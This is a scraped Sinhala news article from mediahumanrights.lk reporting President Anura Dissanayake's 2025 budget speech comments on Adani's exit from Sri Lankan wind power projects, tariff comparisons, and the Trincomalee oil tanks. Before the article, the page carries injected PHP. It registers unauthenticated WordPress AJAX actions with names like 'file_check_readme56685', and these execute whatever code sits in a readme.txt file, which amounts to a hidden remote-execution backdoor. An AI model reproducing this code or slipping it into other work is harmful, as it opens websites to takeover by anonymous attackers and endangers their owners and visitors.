if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අදානිට ජනපති අනුරගෙන් දැඩි ප‍්‍රහාරයක්.. - mediahumanrights.lk
mediahumanrights.lk
International News Local News News

අදානිට ජනපති අනුරගෙන් දැඩි ප‍්‍රහාරයක්..

ශ්‍රී ලංකාවේ සුළං විදුලි බලාගාර ව්‍යාපෘති අතහැර දමා ඉවත්වීමට ඉන්දීය අදානි සමාගම තීරණය කිරීමෙන් පසු ජනාධිපති අනුර දිසානායක මහතා ඒ සම්බන්ධයෙන් පළමුවරට අදහස් පළ කළේය.

ඒ පාර්ලිමේන්තුවේ දී 2025 වසර සඳහා වන අයවැය යෝජනාවලිය ඉදිරිපත් කරමිනි.

ඔහු එහිදී මෙසේ අදහස් පල කලේය.

ශ්‍රී ලංකාවේ ආර්ථික සංර්වර්ධනය සඳහා බල ශක්ති ක්‍ෂේත්‍රය ඉතා වැදගත් වෙනවා. බල ශක්ති ප්‍රභවයන් විවිධාංගීකරණය කිරීම කෙරෙහි අවධානය යොමු කරමින් පුර්නර්ජනනීය බල ශක්තිය සහ යටිතල පහසුකම් නවීකරණය කිරීම සඳහා වැඩි නැඹුරුවක් දක්වනවා. ගාස්තු තීරණය කිරීමේ දී ලංකාවට උපරිම වාසියක් ලබා දිය හැකි දේශීය හා විදේශීය ආයෝජකයින් දිරිගන්වන අතරම බලශක්ති ක්‍ෂේත්‍රයේ ආයෝජනය කිරීමට රජය අඛණ්ඩව කටයුතු කරනවා. ලංකා විදුලිබල මණ්ඩලයේ අභ්‍යන්තර ප්‍රතිව්‍යුහගතකරණයට පහසුකම් සැලසීම සඳහා නියාමන රාමුවට අවශ්‍ය ප්‍රතිසංස්කරණ වලට ප්‍රමුඛත්වය දෙමින් සංශෝධිත විදුලිබල පනත ඉක්මණින් සම්මත කිරීමට අපේක්ෂා කරනවා.

සුළං බලයෙන් විදුලිය ජනනය කිරීමේ මෙගාවොට් 50ක ව්‍යාපෘතියකට අදාලව විදුලි ඒකකයක් සඳහා ඇමරිකානු ඩොලර් ශත 4.65 ක මිලකට පසුගිය දා ටෙන්ඩරයක් ප්‍රදානය කළා. එවැනි තත්ත්වයක් තිබියදී, ඇමරිකානු ඩොලර් ශත 8.26 ක් වැනි අධික ගාස්තුවකට ව්‍යාපෘති ලබාදීම සාධාරණීකරණය කළ නොහැකියි.

කර්මාන්ත, අපනයනකරුවන් සහ පාරිභෝගිකයින්ට තරඟකාරී පිරිවැයකින් බල ශක්තිය සැපයීම සඳහා අපි අවම ගාස්තුවක් මත පදනම් වූ බල ශක්ති ආයෝජන සඳහා ඉඩ ප්‍රස්ථා ලබා දීමට කටයුතු කරනවා. ආයෝජන ගෙන එනු ලබන සමාගම හෝ රට මත රඳා පවතිමින් කටයුතු කිරීමට කිසිවිටකත් අප බලාපොරොත්තු වන්නේ නැහැ.

මෙට්‍රික් ටොන් 10,000 බැගින් ක්‍රියාකාරී ධාරිතාවයකින් යුත් ටැංකි 99 කින් සමන්විත ත්‍රිකුණාමල තෙල් ටැංකි සංකීර්ණයේ තෙල් සංස්ථාවට හා ඉන්දියානු ඔයිල් සමාගමට ලබා දී තිබෙන තෙල් ටැංකි හැර තවත් තෙල් ටැංකි 61 ක් තිබෙනවා. මෙම තෙල් ටැංකි පිහිටි ස්ථානය ද සලකන විට, ජාත්‍යන්තර ඉන්ධන වෙළෙඳපොල වෙත ප්‍රවේශ වීම සඳහා අවස්ථාවක් පවතිනවා. ජාත්‍යන්තරව පිළිගත් ආයතන සමග ඒකාබද්ධ ව්‍යාපාරයක් ලෙස එය සංවර්ධනය කිරීමට අප අපේක්ෂා කරනවා.

Related posts

සුපිරි ක්‍රිකට් ක්‍රීඩකයෙකුගේ රුව යොදා ගත් හෙරොයින් මධ්‍යස්ථානයක් වටලයි

Shiran Viraj

අකමැත්තෙන් වුවත් භාණ්ඩ හිඟයකට මුහුණදීමට වෙනවා.. ඩොලර් නෑ..

Shiran Viraj

විභාග තුළින් පමණක් දරුවන්ගේ දැනුම මැනීම අවසන් කරමින් අධ්‍යාපන ප‍්‍රතිසංස්කරණ…

Shiran Viraj